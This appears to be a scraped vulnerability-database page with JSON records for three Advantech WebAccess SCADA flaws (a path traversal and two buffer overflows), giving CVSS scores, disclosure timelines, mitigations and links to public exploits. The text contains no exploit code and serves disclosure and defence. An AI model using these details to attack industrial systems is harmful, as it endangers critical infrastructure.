WADashboard API in Advantech WebAccess 8.3.1 and 8.3.2 allows remote authenticated attackers to write or overwrite any file on the filesystem due to a directory traversal vulnerability in the writeFile API. An attacker can use this vulnerability to remotely execute arbitrary code. Advantech WebAccess Contains a path traversal vulnerability.Information may be tampered with. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. The WADashboard API is one of the dashboard API components. A path traversal vulnerability exists in the \342\200\230writeFile\342\200\231 method of the WADashboard API in Advantech WebAccess versions 8.3.1 and 8.3.2
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201810-0129", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 3.0, "vendor": "advantech", "version": "8.3.1" }, { "model": "webaccess", "scope": "eq", "trust": 3.0, "vendor": "advantech", "version": "8.3.2" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "8.3.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "8.3.2" } ], "sources": [ { "db": "IVD", "id": "e30112c0-39ab-11e9-ba6a-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22713" }, { "db": "JVNDB", "id": "JVNDB-2018-011787" }, { "db": "CNNVD", "id": "CNNVD-201810-1562" }, { "db": "NVD", "id": "CVE-2018-15705" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-011787" } ] }, "cve": "CVE-2018-15705", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 8.5, "confidentialityImpact": "NONE", "exploitabilityScore": 8.0, "id": "CVE-2018-15705", "impactScore": 9.2, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2018-22713", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e30112c0-39ab-11e9-ba6a-000c29342cb1", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 8.5, "confidentialityImpact": "NONE", "exploitabilityScore": 8.0, "id": "VHN-125991", "impactScore": 9.2, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:N/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitabilityScore": 2.8, "id": "CVE-2018-15705", "impactScore": 3.6, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-15705", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2018-15705", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2018-22713", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201810-1562", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e30112c0-39ab-11e9-ba6a-000c29342cb1", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-125991", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2018-15705", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "e30112c0-39ab-11e9-ba6a-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22713" }, { "db": "VULHUB", "id": "VHN-125991" }, { "db": "VULMON", "id": "CVE-2018-15705" }, { "db": "JVNDB", "id": "JVNDB-2018-011787" }, { "db": "CNNVD", "id": "CNNVD-201810-1562" }, { "db": "NVD", "id": "CVE-2018-15705" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "WADashboard API in Advantech WebAccess 8.3.1 and 8.3.2 allows remote authenticated attackers to write or overwrite any file on the filesystem due to a directory traversal vulnerability in the writeFile API. An attacker can use this vulnerability to remotely execute arbitrary code. Advantech WebAccess Contains a path traversal vulnerability.Information may be tampered with. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. The WADashboard API is one of the dashboard API components. A path traversal vulnerability exists in the \\342\\200\\230writeFile\\342\\200\\231 method of the WADashboard API in Advantech WebAccess versions 8.3.1 and 8.3.2", "sources": [ { "db": "NVD", "id": "CVE-2018-15705" }, { "db": "JVNDB", "id": "JVNDB-2018-011787" }, { "db": "CNVD", "id": "CNVD-2018-22713" }, { "db": "IVD", "id": "e30112c0-39ab-11e9-ba6a-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-125991" }, { "db": "VULMON", "id": "CVE-2018-15705" } ], "trust": 2.52 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-125991", "trust": 0.1, "type": "unknown" }, { "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=45774", "trust": 0.1, "type": "exploit" } ], "sources": [ { "db": "VULHUB", "id": "VHN-125991" }, { "db": "VULMON", "id": "CVE-2018-15705" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-15705", "trust": 3.4 }, { "db": "TENABLE", "id": "TRA-2018-35", "trust": 3.2 }, { "db": "EXPLOIT-DB", "id": "45774", "trust": 1.2 }, { "db": "CNNVD", "id": "CNNVD-201810-1562", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-22713", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-011787", "trust": 0.8 }, { "db": "IVD", "id": "E30112C0-39AB-11E9-BA6A-000C29342CB1", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "150157", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-125991", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2018-15705", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e30112c0-39ab-11e9-ba6a-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22713" }, { "db": "VULHUB", "id": "VHN-125991" }, { "db": "VULMON", "id": "CVE-2018-15705" }, { "db": "JVNDB", "id": "JVNDB-2018-011787" }, { "db": "CNNVD", "id": "CNNVD-201810-1562" }, { "db": "NVD", "id": "CVE-2018-15705" } ] }, "id": "VAR-201810-0129", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "e30112c0-39ab-11e9-ba6a-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22713" }, { "db": "VULHUB", "id": "VHN-125991" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e30112c0-39ab-11e9-ba6a-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22713" } ] }, "last_update_date": "2024-11-23T21:52:47.792000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess/webaccessscada" }, { "title": "Advantech WebAccess WADashboard API Path Traversal Vulnerability Patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/143931" }, { "title": "Exp101tsArchiv30thers", "trust": 0.1, "url": "https://github.com/nu11secur1ty/Exp101tsArchiv30thers " }, { "title": "", "trust": 0.1, "url": "https://github.com/lnick2023/nicenice " }, { "title": "awesome-cve-poc_qazbnm456", "trust": 0.1, "url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 " } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-22713" }, { "db": "VULMON", "id": "CVE-2018-15705" }, { "db": "JVNDB", "id": "JVNDB-2018-011787" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-22", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-125991" }, { "db": "JVNDB", "id": "JVNDB-2018-011787" }, { "db": "NVD", "id": "CVE-2018-15705" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.2, "url": "https://www.tenable.com/security/research/tra-2018-35" }, { "trust": 1.3, "url": "https://www.exploit-db.com/exploits/45774/" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15705" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-15705" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/22.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://tools.cisco.com/security/center/viewalert.x?alertid=58931" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-22713" }, { "db": "VULHUB", "id": "VHN-125991" }, { "db": "VULMON", "id": "CVE-2018-15705" }, { "db": "JVNDB", "id": "JVNDB-2018-011787" }, { "db": "CNNVD", "id": "CNNVD-201810-1562" }, { "db": "NVD", "id": "CVE-2018-15705" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "e30112c0-39ab-11e9-ba6a-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22713" }, { "db": "VULHUB", "id": "VHN-125991" }, { "db": "VULMON", "id": "CVE-2018-15705" }, { "db": "JVNDB", "id": "JVNDB-2018-011787" }, { "db": "CNNVD", "id": "CNNVD-201810-1562" }, { "db": "NVD", "id": "CVE-2018-15705" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-11-08T00:00:00", "db": "IVD", "id": "e30112c0-39ab-11e9-ba6a-000c29342cb1" }, { "date": "2018-11-07T00:00:00", "db": "CNVD", "id": "CNVD-2018-22713" }, { "date": "2018-10-31T00:00:00", "db": "VULHUB", "id": "VHN-125991" }, { "date": "2018-10-31T00:00:00", "db": "VULMON", "id": "CVE-2018-15705" }, { "date": "2019-01-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011787" }, { "date": "2018-11-01T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1562" }, { "date": "2018-10-31T22:29:00.413000", "db": "NVD", "id": "CVE-2018-15705" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-11-08T00:00:00", "db": "CNVD", "id": "CNVD-2018-22713" }, { "date": "2018-12-12T00:00:00", "db": "VULHUB", "id": "VHN-125991" }, { "date": "2018-12-12T00:00:00", "db": "VULMON", "id": "CVE-2018-15705" }, { "date": "2019-01-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011787" }, { "date": "2018-11-01T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1562" }, { "date": "2024-11-21T03:51:18.680000", "db": "NVD", "id": "CVE-2018-15705" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201810-1562" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess WADashboard API Path traversal vulnerability", "sources": [ { "db": "IVD", "id": "e30112c0-39ab-11e9-ba6a-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22713" }, { "db": "CNNVD", "id": "CNNVD-201810-1562" } ], "trust": 1.4 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Path traversal", "sources": [ { "db": "IVD", "id": "e30112c0-39ab-11e9-ba6a-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201810-1562" } ], "trust": 0.8 } }
var-201602-0479
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C80 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to memcpy using the ProjectName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201602-0479", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-149" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-149" } ], "trust": 0.7 }, "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-149", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-149", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-149" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C80 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to memcpy using the ProjectName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-149" } ], "trust": 0.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3158", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-149", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-149" } ] }, "id": "VAR-201602-0479", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:51:03.675000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-149" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-149" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-16-149" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-149" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-149" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "(0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll ProjectName memcpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-149" } ], "trust": 0.7 } }
var-201708-1709
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-553" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-553" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-553", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-553", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-553" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-553" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4109", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-553", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-553" } ] }, "id": "VAR-201708-1709", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:47:53.697000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-553" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-553" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-553", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-553", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-553", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech 